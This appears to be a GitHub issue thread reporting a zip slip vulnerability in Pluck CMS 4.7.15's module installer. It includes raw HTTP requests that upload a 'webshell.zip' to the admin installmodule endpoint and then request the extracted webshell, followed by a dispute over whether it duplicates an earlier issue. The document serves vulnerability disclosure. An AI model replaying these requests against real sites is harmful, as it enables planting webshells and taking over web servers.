Pluck 4.7.15 - Zip Slip Vulnerability

Question

Pluck 4.7.15 - Zip Slip Vulnerability

debug601 opened this issue 3 years ago · comments

Issue Summary
Pluck's module and installmodule are vulnerable to directory traversal (via zip slip) and arbitrary code execution.
php version: php5.2.1
Detailed Description
There is a problem in Pluuck 4.7.15. / data/inc/module_install.php allows remote malicious users to upload malicious zip files to traverse directories outside the expected environment, which may allow execution of arbitrary code that will run with the privileges of the user assigned to the Web server.

Vulnerability url:
http://192.168.1.128/pluck4.7.15/admin.php?action=installmodule

Vulnerability POC:

POST /pluck4.7.15/admin.php?action=installmodule HTTP/1.1
Host: 192.168.1.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.128/pluck4.7.15/admin.php?action=installmodule
Cookie: PHPSESSID=9f912ae90a81102465d8590f4f007e8e
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------26434200512599
Content-Length: 478

-----------------------------26434200512599
Content-Disposition: form-data; name="sendfile"; filename="webshell.zip"
Content-Type: application/x-zip-compressed

PK���
-----------------------------26434200512599
Content-Disposition: form-data; name="submit"

Upload
-----------------------------26434200512599--

arbitrary code execution

GET /pluck4.7.15/data/modules/webshell/2.php HTTP/1.1
Host: 192.168.1.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=9f912ae90a81102465d8590f4f007e8e
Connection: close

Impact
This vulnerability allows remote code execution and directory traversal under the privileges of the user running the Web server application.

Bas Steelooper · Answer 1 · Mon Dec 13 2021 21:06:03 GMT+0800 (China Standard Time)

This is a duplicate of issue #100 which has been fixed in the latest dev version.

debug601 · Answer 2 · Mon Dec 13 2021 21:09:47 GMT+0800 (China Standard Time)

This is a new way to use it.

Bas Steelooper · Answer 3 · Mon Dec 13 2021 21:24:34 GMT+0800 (China Standard Time)

See if it still exists in the latest dev version. issue #100 is fixed in the latest version, which should make zip zip impossible.

debug601 · Answer 4 · Mon Dec 13 2021 21:28:47 GMT+0800 (China Standard Time)

查看它是否仍存在于最新的开发版本中。问题#100在最新版本中已修复，这应该使zip无法进行。

I also tested it on Pulck4.7.16.dev1 and found this vulnerability.
This means that pluck4.7.15 has not fixed this utilization method at all. This is fundamentally different from # 100. I believe this loophole exists in pluck4.7.15,pluck4.7.16.dev1-dev3 and all the versions you have released so far. I want to apply for cve for each version.

debug601 · Answer 5 · Mon Dec 13 2021 21:33:13 GMT+0800 (China Standard Time)

#100 is the use of the file "/ admin.php?action=themeinstall", #105 while mine is "admin.php?action=installmodule". These are two different ways of using it.

debug601 · Answer 6 · Mon Dec 13 2021 21:57:03 GMT+0800 (China Standard Time)

See if it still exists in the latest dev version. issue #100 is fixed in the latest version, which should make zip zip impossible.

You shouldn't say that my use is repeated. He is real.